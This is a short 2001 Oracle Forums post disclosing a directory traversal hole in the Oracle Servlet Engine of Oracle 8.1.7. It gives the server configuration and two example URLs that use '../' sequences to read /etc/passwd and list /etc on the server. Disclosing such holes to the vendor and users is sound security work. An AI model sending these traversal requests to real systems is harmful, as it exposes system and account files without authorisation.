Database Software

Announcement

For appeals, questions and feedback about Oracle Forums, please email oracle-forums-moderators_us@oracle.com. Technical questions should be asked in the appropriate category. Thank you!

Security Vulnerability: Oracle Servlet Engine in 8.1.7 Database

☺Oct 27 2001

It seems, Oracle Servlet Engine has a security hole.
$ORACLE_HOME=/u0/oracle
Release 8.1.7.X default installation
Oracle Servlet Engine configured in init.ora as
mts_dispatchers = "(ADDRESS=(PROTOCOL=TCP)(HOST=srv)
(PORT=8000))(DISP=1)(PRE=http://admin)"
(it is also possible to configure as in documentation:
$ORACLE_HOME/Apache/Apache/htdocs/mod_ose.html).
OSE works fine and i see "flying pig" on http://srv:8000
It is possible to show all contents of server' directory structure
available for Oracle' user:

http://srv:8000/../../../../../../../../../../etc/passwd
http://srv:8000/../../../../../../../../../../etc/

Locked Post

New comments cannot be posted to this locked post.

Locked on Nov 24 2001

Added on Oct 27 2001

#database-security, #database-security-general

0 comments

391 views